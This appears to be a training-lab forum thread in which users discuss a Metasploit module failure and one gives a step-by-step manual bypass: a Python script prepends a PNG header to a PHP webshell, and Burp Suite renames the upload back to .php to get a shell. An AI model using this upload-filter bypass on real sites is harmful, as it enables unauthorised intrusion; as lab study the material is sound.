Reverse Shell & Payloads - The live engagement

I was stuck at host 2 with the 50064.rb for a while until I realized I was using the wrong password lol. I had admin!@# instead of admin123!@# for some reason and that was what was creating the “unexpected json response” for me apparently (even though I also got the “successfully logged in with admin” message???). So yeah, I’d recommend triple checking every option. This is what ended up working for me:

If at all you don’t want to go in the metasploit way. we can achieve the same by observing what the exploit is doing.

  • The blog is checking for an image extension in the file we upload

  • If we change the .php to .png it doesn’t accept because it is checking for an valid header

So, we need to figure out a way where we can trick the server into accepting a .php by making it believe it is an image file

  1. get a copy of php webshell and dump it into your machine
  2. now we need to add an png header to this web shell. Execute the below python script
import base64
png_header_base64 = 'iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4'

# Decode the PNG header
png_header = base64.b64decode(png_header_base64)

# Specify the file name
file_name = 'webshell.php'

# Read the existing content of the PHP file
with open(file_name, 'rb') as file:
    php_content = file.read()

# Combine the PNG header with the PHP content
new_content = png_header + php_content

# Write the modified content back to the PHP file
with open(file_name, 'wb') as file:
    file.write(new_content)
  1. Rename the webshell.php to webshell.png
  2. Now open the burp suite turn the interceptor on
  3. Go to the blog and upload this webshell.png
  4. Now burp will intercept this request just change the extension from webshell.png to webshell.php and hit forward
  5. This will trick the server and the post gets uploaded
  6. hover over the image to see where it’s located
  7. Go to the location and click on the uploaded php file and voila you get a shell!!

check out my solution if you wan’t to know how the exploit is working and how to achieve it manually.
For metasploit @yearsandseconds solution is enough

most likely you used wrong password